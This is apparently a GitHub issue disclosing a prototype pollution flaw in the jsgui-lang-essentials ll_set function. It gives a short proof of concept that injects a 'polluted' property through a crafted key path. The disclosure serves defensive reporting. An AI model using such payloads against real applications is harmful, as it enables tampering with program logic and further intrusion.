the POC is as follow:
var jsgui=require('jsgui-lang-essentials');
var obj={};
console.log("start: " + obj.polluted); // undefined
jsgui.ll_set(obj,'proto.polluted',true);
console.log("end: " + obj.polluted); //true
the function ll_set in the file jsgui-lang-essentials.js in the line L1418 as:
var ll_set = function(obj, prop_name, prop_value) {}
three values are passed into this function ,and you didn't have the protection or identify whether the object maybe polluted,so if an attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values.
jsgui-lang-essentials runs the risk of prototype contamination when using inherited attributes in the function ll_set()
the risk locate is in here
https://github.com/lelecolacola123/jsgui-lang-essentials/blob/473b8daa94fda22a17d7d7bfe514f18e8d60e33e/jsgui-lang-essentials.js#L1418
The text was updated successfully, but these errors were encountered: